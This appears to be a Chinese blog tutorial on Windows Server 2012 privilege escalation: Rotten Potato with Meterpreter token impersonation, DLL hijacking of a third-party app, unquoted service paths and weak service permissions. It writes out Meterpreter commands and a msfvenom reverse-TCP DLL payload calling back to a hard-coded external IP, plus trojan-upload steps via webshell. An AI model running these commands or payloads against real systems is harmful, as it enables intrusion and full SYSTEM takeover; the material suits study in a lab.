首页 > 其他分享 >权限提升-烂土豆&dll劫持&引号路径&服务权限

权限提升-烂土豆&dll劫持&引号路径&服务权限

时间:2023-09-14 15:27:09浏览次数:49  
标签:web 引号 dll 提权 MSF 权限 窃取

必备知识点:

#令牌窃取配合烂土豆提权

单纯令牌窃取:web权限或本地提权

如配合烂土豆提权:web或数据库等权限

 

#不带引号服务路径安全问题

服务路径提权:web权限或本地提权

 

#不安全的服务权限配置问题

服务权限配置:WEB权限或本地提权(web几率小)

 

#补充说明:dll劫持提权及AlwaysInstallElevated等说明

dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋

AlwaysInstallElevated提权默认禁用配置,利用成功机会很少

 

演示案例:

Win2012-烂土豆配合令牌窃取提权-Web权限

如果单单用令牌窃取,权限太低,无法窃取。例如,如果是web权限(IIS类似的服务权限)

原理:参考上述图片内容,非服务类用户权限无法窃取成功(原理)

过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功


upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

通过webshell上传木⻢,并且执行

执行之前先在msf上开启监听

 

执行之后在msf看到会话

上传烂土豆并且执行(执行并非在webshell上执行,而是在MSF上执行)

 

在msf中没有在C盘列表中看到potato.exe文件,但通过webshell我们可以知道我们已经上传了,在C盘根目录之后再使用令牌窃取

Win2012-DLL劫持提权应用配合MSF-web权限

原理:Windows程序启动的时候需要DLL,如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预先定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1.应用程序加载的目录

2.C:\Windows\system32

3.C:\Windows\system

4.C:\windows

5.当前工作目录Current Working Directory,CWD

6.在PATH环境变量的目录(先系统后用户)

 

过程:信息收集(搜集服务器上其他的第三方应用)-进程调试(分析这个程序启动时调用那些dll)-制作dll并上传-替换dll-启动应用后成功

msfvenom -p windows/meterpreter/reverse_tcp

lhost=101.37.169.46 lport=6677 -f ddl >/opt/xiaodi.dll

收集信息

发现一个flashfxp第三方软件

进程调试

在网上下载flashfxp软件

用火绒剑来调试软件

寻找非系统文件

生成dll

使用MSF生产dll,使用上述命令

替换dll,MSF监听,当软件执行时调用dll,反弹成功

然后再使用令牌窃取提权至system

满足条件:

y有第三方软件

能够替换dll

管理员要去运行这个程序

win2012-不安全的服务权限配合MSF-本地权限

监听,获得会话,直接获得SYstem权限

win2012-不带引号服务路径配合MSF-web,本地提权

该命令显示这两个地方可以操作。有安全问题的必须时目录里面带空格的

当这样执行时,系统会把C:\Program空格后面的当作参数

我们可以把一个cmd名字改为Program,这样就能运行了

上传名字为Program的木⻢,用本地启用,启动端口监听,获得了会话

关于Windows相关知识点总结说明-权限层,系统层,防护层等

掌握:提权方法对应层面,提权方法对应系统版本,相关文件及后⻔免杀问题等

 

标签:web,引号,dll,提权,MSF,权限,窃取
From: https://www.cnblogs.com/Zx770/p/17702562.html

相关文章

  • 从零开始使用vue2+element搭建后台管理系统(实现按钮权限控制)
    思路:登录后请求用户信息接口,后端返回用户信息中包括权限数组,数据格式belike: 前端对用户信息进行存储(对没错又是假接口)://获取用户信息asyncgetUserInfo(mobile){try{this.loading=true;constres=awaitgetInfo(mobile);......
  • 3.3 DLL注入:突破会话0强力注入
    Session是Windows系统的一个安全特性,该特性引入了针对用户体验提高的安全机制,即拆分Session0和用户会话,这种拆分Session0和Session1的机制对于提高安全性非常有用,这是因为将桌面服务进程,驱动程序以及其他系统级服务取消了与用户会话的关联,从而限制了攻击者可用的攻击面。由于DL......
  • 3.4 DLL注入:全局消息钩子注入
    SetWindowHookEx是Windows系统的一个函数,可用于让一个应用程序安装全局钩子,但读者需要格外注意该方法安装的钩子会由操作系统注入到所有可执行进程内,虽然该注入方式可以用于绕过游戏保护实现注入,但由于其属于全局注入所以所有的进程都会受到影响,而如果想要解决这个问题,则需要在Dll......
  • Linux权限管理(练习Ⅰ)
    基本命令练习添加组:jishubu[root@localhost~]#groupaddjishubu添加用户:natasha、mary、mike,密码和用户名相同,然后均加入jishubu组[root@localhost~]#useraddnatasha[root@localhost~]#useraddmary[root@localhost~]#useraddmike[root@localhost~]#echonatash......
  • RBAC教程()简单的RBAC权限管理框架
    一.RBAC简介基于角色的访问控制RBAC的权限管理,基于角色的访问控制(Role-BasedAccessControl),在RBAC中,权限与角色相关联,用户通过成为适当角色的成员而得到这些角色的权限。最后的结果就是不同的用户登录系统会看到不同的功能,也就是菜单。二.简单结构图 ......
  • 3.1 DLL注入:常规远程线程注入
    动态链接库注入技术是一种特殊的技术,它允许在运行的进程中注入DLL动态链接库,从而改变目标进程的行为。DLL注入的实现方式有许多,典型的实现方式为远程线程注入,该注入方式的注入原理是利用了Windows系统中提供的CreateRemoteThread()这个API函数,该函数第四个参数是准备运行的线程,我......
  • 3.2 DLL注入:远程APC异步注入
    APC(AsynchronousProcedureCall)异步过程调用是一种Windows操作系统的核心机制,它允许在进程上下文中执行用户定义的函数,而无需创建线程或等待OS执行完成。该机制适用于一些频繁的、短暂的或非常细微的操作,例如改变线程优先级或通知线程处理任务。在APC机制中,当某些事件发生时(例如......
  • linux shell 字符串变量 有双引号和无双引号的区别
     001、[root@pc1test02]#lsa.shb.sh[root@pc1test02]#cata.sh##测试程序1#!/bin/bashstr1="ab_cd_ef"tmp1=$(echo$str1|sed's/_/\n/g')echo$tmp1[root@pc1test02]#catb.sh##测试程序2#!/bin/bashstr1="ab_......
  • 配置服务器ECR永久的权限
    退出仓库登陆dockerlogoutxxxxx.dkr.ecr.ap-east-1.amazonaws.com部署docker-credential-ecr-login法1wgethttps://amazon-ecr-credential-helper-releases.s3.us-east-2.amazonaws.com/0.7.1/linux-amd64/docker-credential-ecr-loginmvdocker-credential-ecr-login/usr/lo......
  • 基于自定义表编写认证类、django-jwt源码分析、权限介绍、simpleui的使用
    基于自定义表编写认证类补充:翻译函数只要做了国际化,就会显示当前国家的语言fromdjango.utils.translationimportgettext_lazyas_msg=_('Signaturehasexpired.')#_是个函数的别名,这个函数是翻译函数,只要做了国际化,它就是中文认证类fromrest_framework_jwt......